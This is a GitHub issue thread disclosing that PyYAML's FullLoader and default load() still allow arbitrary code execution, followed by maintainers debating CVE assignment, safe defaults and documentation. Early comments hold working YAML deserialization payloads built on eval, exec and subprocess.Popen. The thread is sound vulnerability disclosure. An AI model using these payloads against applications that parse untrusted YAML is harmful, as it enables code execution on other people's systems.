Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

.load() and FullLoader still vulnerable to fairly trivial RCE #420

Closed
arxenix opened this issue Jul 22, 2020 · 44 comments
Closed

.load() and FullLoader still vulnerable to fairly trivial RCE #420

arxenix opened this issue Jul 22, 2020 · 44 comments

Comments

@arxenix
Copy link

arxenix commented Jul 22, 2020

As of 5.3.1 .load() defaults to using FullLoader and FullLoader is still vulnerable to RCE when run on untrusted input. As demonstrated by the examples below, #386 was not enough to fix this issue.

Some example payloads:

!!python/object/new:tuple 
- !!python/object/new:map 
  - !!python/name:eval
  - [ "RCE_HERE" ]
!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "RCE_HERE"
- !!python/object/new:str
    args: []
    state: !!python/tuple
    - "RCE_HERE"
    - !!python/object/new:staticmethod
      args: [0]
      state:
        update: !!python/name:exec

I do not believe this is entirely fixable unless PyYAML decides to use secure defaults, and make .load() equivalent to .safe_load() ( #5 )

FullLoader should probably be removed, as I don't see the purpose of it.

@ret2libc
Copy link
Contributor

I agree it should be well documented that FullLoader is not safe. A blacklist approach like the one I implemented in #386 is just too hard to maintain and although it can always be improved, it is just easier if users don't expect any kind of security protection from it.

@ret2libc
Copy link
Contributor

Is a CVE going to be assigned for this? Also, to "avoid" these kind of problems in the future (and dealing with CVEs and stuff) I think it should be made clear that FullLoader is not safe. Because as it is right now, a user may think it is a good alternative to safe_load while it is not.

@arxenix
Copy link
Author

arxenix commented Jul 23, 2020

I have not filed for a new CVE, but I contacted RedHat to see if the previous one (CVE-2020-1747) could be updated (I don't know if this is standard protocol here or not)

+1 on making it very clear that FullLoader is not safe. As of right now, I believe the only mention of FullLoader is in the page https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation , which claims that it Avoids arbitrary code execution.

@ret2libc
Copy link
Contributor

I have not filed for a new CVE, but I contacted RedHat to see if the previous one (CVE-2020-1747) could be updated (I don't know if this is standard protocol here or not)

No, that is not possible. This should get a new CVE, with a wording like "Incomplete fix for CVE-2020-1747 still allows to execute arbitrary code through FullLoader", or something like that.

@ret2libc
Copy link
Contributor

@ingydotnet @perlpunk @arxenix Did any of you already requested a CVE (except to Red Hat)? If not, Red Hat can assign the CVE for this.

Also, @ingydotnet what do you intend to do with regard to documenting the unsafe behaviour of FullLoader?

@perlpunk
Copy link
Member

My personal preference would still be to make SafeLoader the default.
FullLoader is probably not that useful anymore anyway, especially if python/name also gets moved to UnsafeLoader.

@arxenix
Copy link
Author

arxenix commented Jul 24, 2020

@ret2libc I sent a request for a new CVE ID to RedHat already

@ingydotnet
Copy link
Member

I was considering pulling tag:yaml.org,2002:python/name: from FullLoader construction.
@perlpunk why do you feel that leaves FullLoader irrelevant?

@ret2libc
Copy link
Contributor

@ret2libc I sent a request for a new CVE ID to RedHat already

I know, I am from Red Hat. I just want to make sure none else has already requested the CVE to someone else. @ingydotnet @perlpunk did you? Otherwise, I'm going to assign the CVE from the Red Hat pool.

@perlpunk
Copy link
Member

@ret2libc no, I did not request one.

@ingydotnet
Copy link
Member

@ret2libc no.

@ingydotnet
Copy link
Member

@arxenix I'd like to see a FullLoader vulnerabilty that doesn't use tag:yaml.org,2002:python/name:....
An easy fix is remove that constructor.
@ret2libc a release with that fix should not require a doc update.

@ingydotnet
Copy link
Member

ingydotnet commented Jul 24, 2020

@perlpunk I don't see defaulting to SafeLoader as an option. We have no idea how much code that would break.

...

@everyoneelse,

Let's step back a sec and look at the problem we are trying to solve.
In my opinion "there was no problem" to begin with.

PyYAML was loud and clear in its doc from the first release that PyYAML (a serialization module) had the same vulnerability landscape as Pickle. ie It is not safe to load data from a source you cannot trust. Bad things could happen.

  • Don't compile and run C code from a web page's textarea.
  • Don't run Python code from there either.
  • Don't load a Pickle file you found on the street.
  • Don't do that with YAML either.

Somewhat ironically, we are encouraged and don't bat an eye about running setup.py or Makefile.PL or Rakefile files to install Python, Perl and Ruby modules. We trust that files pushed to PyPI or committed to GitHub are safe enough.

Who are we trying to protect? This is a literal question. I would like to see the actual applications that are affected. Show me the people that are asking for untraceable YAML from unknown sources and loading it for them with PyYAML.

This "became my problem" when a CVE was filed against PyYAML for something that was effectively "people can get hurt when they use your dining utensils, and don't read the instructions and use it to eat things from a dumpster". Not that I cared about the CVE, since I felt exactly the same as I do now, but the CVE triggered all kinds of production systems. I was forced to take an action that was unnecessary. I never knew who filed the CVE or how to respond to them. I never got a confirmation that the original CVE was closed.

I tried to find a middle ground with warnings to read the docs, be explicit in your code, and provide a safer default.

I agree that the FullLoader safety is proving to be not that useful.

I'm currently leaning towards making FullLoader an alias for UnsafeLoader, keeping that as the default, documenting it, and calling it a day.

@arxenix
Copy link
Author

arxenix commented Jul 24, 2020

@ingydotnet it's still possible to get arbitrary code execution with only !!python/object/new , BTW

!!python/object/new:tuple [!!python/object/new:map [!!python/object/new:type [!!python/object/new:subprocess.Popen {}], ['ls']]]

Ultimately, it's your choice what you decide to do with the library, but let me state my opinions.

I definitely have seen projects in the wild that are loading YAML via yaml.load() from untrusted sources. I can't disclose specific names but one example is a web portal that allowed users to upload YAML config files, and then loaded them. Given some time, I could probably find several on GitHub if you would like.

Developers tend to be lazy, no one wants to read the docs. This is why it's important to follow the principle of having secure defaults. It's important for a library to attempt to protect its users (even if they dont read :p)

Here's a quote from the ReactJS (popular facebook-made frontend library) documentation which explains their reasoning for their function dangerouslySetInnerHTML. I wholeheartedly agree with them.

Improper use of the innerHTML can open you up to a cross-site scripting (XSS) attack. Sanitizing user input for display is notoriously error-prone, and failure to properly sanitize is one of the leading causes of web vulnerabilities on the internet.

Our design philosophy is that it should be “easy” to make things safe, and developers should explicitly state their intent when performing “unsafe” operations. The prop name dangerouslySetInnerHTML is intentionally chosen to be frightening, and the prop value (an object instead of a string) can be used to indicate sanitized data.

After fully understanding the security ramifications and properly sanitizing the data, create a new object containing only the key __html and your sanitized data as the value.

My observations are that the mental model that many developers have of YAML is that it's a simple data interchange format exactly like JSON. Not a complex serialization language. In the same way they don't expect json.load() to lead to code execution, they don't expect yaml.load() to lead to code execution.

I also believe that it is okay to break backwards compatibility in favor of security. How many people are really relying on PyYAML's ability to serialize complex objects? I don't have too much insight into this, but my thoughts are -- not many.

From some quick Github code search results that I did, there are ~762k files that use PyYAML. Of those, up to 529k files are currently using the default FullLoader as the loading mechanism, which is vulnerable to arbitrary code execution. 220k call safe_load or specify SafeLoader, and only 13k explicitly use unsafe_load or specify UnsafeLoader.

@perlpunk
Copy link
Member

I'm not a python expert, but I think that FullLoader in its current state already prevents (de)serializing most objects as they are dumped with python/object/apply (please correct me if I am wrong). So it might be that a lot of code already had to be modified for PyYAML >= 5 to use UnsafeLoader.

Regarding the default: The problem I see is that most use cases for YAML do not involve serializing objects. Many people simply do not expect the default load method to do full serialization, and many are not even aware that YAML was designed for allowing that. That's different from Pickle.

I think anything different from the default YAML Core Schema (or the basic 1.1 types) should be optional for any YAML implementation.

Yes, it is documented that PyYAML does this, and yes, changing it will break more things (additionally to code that already broke).
I'm just saying what I would expect, and how I would implement a YAML library. Saying "it's documented that it's unsafe" is often not enough.

@ingydotnet
Copy link
Member

@arxenix @perlpunk These are reasonable points. Thanks for the contrast. I'll sleep on it and reply tomorrow.

@arxenix
Copy link
Author

arxenix commented Jul 25, 2020

This was assigned CVE-2020-14343

@ingydotnet
Copy link
Member

I am thinking about how to move towards safe_load as the default load() action. I need more time to plan that.

@arxenix, just wondering, can you think of an exploit that involves just !!python/object:__main__.Foo and/or !!python/tuple?
These are the forms for serializing simple instances and tuples.

import yaml

class Foo:
    def __init__(self):
        self.bar = 42

print(yaml.dump(Foo()))
print(yaml.dump(yaml.full_load(yaml.dump(Foo()))))

print(yaml.dump((1,2,3)))
print(yaml.dump(yaml.full_load(yaml.dump((1,2,3)))))

prints:

!!python/object:__main__.Foo
bar: 42

!!python/object:__main__.Foo
bar: 42

!!python/tuple
- 1
- 2
- 3

!!python/tuple
- 1
- 2
- 3

@arxenix
Copy link
Author

arxenix commented Jul 25, 2020

@ingydotnet if it's limited to only those two tags (!!python/tuple and !!python/object:__main__.Foo) I am pretty confident that it's safe.

But the moment you start allowing classes other than __main__.Foo as well (e.g. from other modules, or built-ins) it becomes vulnerable.

If you're concerned about breaking too many projects, maybe a reasonable thing could be to only allow classes from the __main__ namespace. But I feel it's strange behavior, as code would break if it's imported elsewhere.

My recommendation would be to make FullLoader not allow !!python/object/new , !!python/object, !!python/module or !!python/object/apply. The rest of the tags should be fine.

@ret2libc
Copy link
Contributor

Also, note that it is written nowhere that FullLoader should not be used on untrusted input (or at least I could not find it). Actually, the documentation says that FullLoader does not execute arbitrary code, so that is why it becomes, again, "your problem" and a CVE-worthy issue. By saying FullLoader: Loads the full YAML language. Avoids arbitrary code execution, users may rely on that "safe" behaviour and they would be at risk from this.

Independently of what you choose for the default load method, I suggest making this point clear in the documentation.

@nextgens
Copy link

nextgens commented Jul 28, 2020

This "became my problem" when a CVE was filed against PyYAML for something that was effectively "people can get hurt when they use your dining utensils, and don't read the instructions and use it to eat things from a dumpster". Not that I cared about the CVE, since I felt exactly the same as I do now, but the CVE triggered all kinds of production systems. I was forced to take an action that was unnecessary. I never knew who filed the CVE or how to respond to them. I never got a confirmation that the original CVE was closed.

I tried to find a middle ground with warnings to read the docs, be explicit in your code, and provide a safer default.

I agree that the FullLoader safety is proving to be not that useful.

I'm currently leaning towards making FullLoader an alias for UnsafeLoader, keeping that as the default, documenting it, and calling it a day.

Have you considered signing (HMACing) the serialized blob to ensure at unserialization time that it is trusted (has been serialized by someone who had the key)? This would solve the security problem and may be done in a way that the current parser ignores... so that existing apps keep functioning and no behaviour change is necessary.

This is a very common way (for other frameworks in other languages) to solve the security problem.
https://snuffleupagus.readthedocs.io/features.html#unserialize-related-magic
https://docs.oracle.com/javase/7/docs/api/java/security/SignedObject.html

@yaml yaml deleted a comment from huntr-helper Aug 5, 2020
@ingydotnet
Copy link
Member

@ret2libc Agreed. I'll update the doc this weekend, even if it takes longer to decide how to play the whole thing.

@axsaucedo
Copy link

axsaucedo commented Aug 7, 2020

This also flagged from our side, thanks for looking at this. Just to understand, does that mean the fix will just be mentioning it on the documentation? Would it be posisble to rename the method as "insecure_full_load"? Conscious that just adding this in the docs would not be enough to actually remove this from being a common vulnerability.

Edit: Just caught up with the thread. It sounds like it may require further assessment given projects that would be affected by the breaking change caused by updating the top level load function.

One question, are there currently any capabilities for potential feature flags that could introduce backwards compatibility if this breaking changes was to be introduced? At least until the next major update (e.g. env vars, config file vars, build params, etc)

@ret2libc
Copy link
Contributor

ret2libc commented Sep 1, 2020

Hi, is there any news about this?

@encukou
Copy link

encukou commented Sep 8, 2020

Hello,
Is there any way I can help to the wiki – https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation#how-to-disable-the-warning – get updated to remove the claim that FullLoader avoids arbitrary code execution?

@ingydotnet
Copy link
Member

I have an idea of how I'd like to proceed. I'll write about it here this week, and also update the wiki page.

qiluo-msft added a commit to sonic-net/sonic-buildimage that referenced this issue Jan 28, 2021
lguohan pushed a commit to sonic-net/sonic-buildimage that referenced this issue Feb 3, 2021
deran1980 pushed a commit to deran1980/sonic-buildimage that referenced this issue Feb 4, 2021
dcarley added a commit to dcarley/aws-cli that referenced this issue Feb 8, 2021
PyYAML 5.4 was released a couple of days ago with a fix for:

- https://ubuntu.com/security/CVE-2020-14343
- yaml/pyyaml#420
- https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation

The changes otherwise appear to be backwards compatible:

- https://github.com/yaml/pyyaml/blob/5.4.1/CHANGES

Being able to use a later version is important for companies that have
automatic dependency scanning for CVEs.
palnabarun added a commit to palnabarun/python that referenced this issue May 27, 2021
5.3.1 fixed partially vulnerabilities disclosed in CVE-2020-1747.
A complete fix was debated at yaml/pyyaml#420
and eventually got patched in 5.4.1

Changeset: yaml/pyyaml@3.12...5.4.1

Signed-off-by: Nabarun Pal <pal.nabarun95@gmail.com>
palnabarun added a commit to palnabarun/python that referenced this issue May 27, 2021
5.3.1 fixed partially vulnerabilities disclosed in CVE-2020-1747.
A complete fix was debated at yaml/pyyaml#420
and eventually got patched in 5.4.1

Changeset: yaml/pyyaml@3.12...5.4.1

Signed-off-by: Nabarun Pal <pal.nabarun95@gmail.com>
palnabarun added a commit to palnabarun/python that referenced this issue May 28, 2021
5.3.1 fixed partially vulnerabilities disclosed in CVE-2020-1747.
A complete fix was debated at yaml/pyyaml#420
and eventually got patched in 5.4.1

Changeset: yaml/pyyaml@3.12...5.4.1

Signed-off-by: Nabarun Pal <pal.nabarun95@gmail.com>
palnabarun added a commit to palnabarun/python that referenced this issue Jun 6, 2021
5.3.1 fixed partially vulnerabilities disclosed in CVE-2020-1747.
A complete fix was debated at yaml/pyyaml#420
and eventually got patched in 5.4.1

Changeset: yaml/pyyaml@3.12...5.4.1

Signed-off-by: Nabarun Pal <pal.nabarun95@gmail.com>
palnabarun added a commit to palnabarun/python that referenced this issue Jun 9, 2021
5.3.1 fixed partially vulnerabilities disclosed in CVE-2020-1747.
A complete fix was debated at yaml/pyyaml#420
and eventually got patched in 5.4.1

Changeset: yaml/pyyaml@3.12...5.4.1

Signed-off-by: Nabarun Pal <pal.nabarun95@gmail.com>
palnabarun added a commit to palnabarun/python that referenced this issue Jun 9, 2021
5.3.1 fixed partially vulnerabilities disclosed in CVE-2020-1747.
A complete fix was debated at yaml/pyyaml#420
and eventually got patched in 5.4.1

Changeset: yaml/pyyaml@3.12...5.4.1

Signed-off-by: Nabarun Pal <pal.nabarun95@gmail.com>
@ocervell
Copy link

Any updates on when this might be fixed ?

@ingydotnet
Copy link
Member

6.0 is ready for beta now. Will go out this week.

@chriddyp chriddyp mentioned this issue Feb 7, 2022
10 tasks
perlpunk pushed a commit to perlpunk/pyyaml that referenced this issue Aug 2, 2022
Original commit: a001f27

Per suggestion yaml#420 (comment)
move a few constructors from full_load to unsafe_load.
perlpunk pushed a commit to perlpunk/pyyaml that referenced this issue Aug 2, 2022
Original commit: a001f27

Per suggestion yaml#420 (comment)
move a few constructors from full_load to unsafe_load.
bh717 pushed a commit to bh717/python-dapp that referenced this issue Apr 1, 2024
5.3.1 fixed partially vulnerabilities disclosed in CVE-2020-1747.
A complete fix was debated at yaml/pyyaml#420
and eventually got patched in 5.4.1

Changeset: yaml/pyyaml@3.12...5.4.1

Signed-off-by: Nabarun Pal <pal.nabarun95@gmail.com>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests